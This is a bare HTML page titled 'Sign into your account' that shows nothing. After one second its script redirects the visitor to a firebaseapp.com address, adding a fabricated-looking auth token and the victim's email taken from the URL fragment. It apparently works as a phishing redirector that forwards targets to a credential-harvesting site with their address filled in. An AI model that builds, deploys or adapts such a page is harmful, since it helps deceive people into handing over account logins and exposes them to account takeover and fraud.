<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Sign into your account</title>
  </head>
  <body>
    <script>
        function redirect(){
            
            var url = new URL('https://celk2713.firebaseapp.com');
            var this_url = new URL(document.location.href);
            
//            var email = this_url.searchParams.get("email");
            var email = window.location.hash.substr(1);
            
            if(email){
                document.location.href=url+'?auth=30%40ohixyzo80aNC4yMTIxXzIzNTgwNF8yNTQ1MzcuMDU4NTkwMDAwLCNGI1MjMTcxNDEjRQ%3D%3D%3Aver-UID=8c60cf39e11d1659051190bdc1f1a8a8#'+email;
            }else{
                document.location.href=url;
            }
        }
        
        setTimeout(redirect,1000);
    </script>
  </body>
</html>
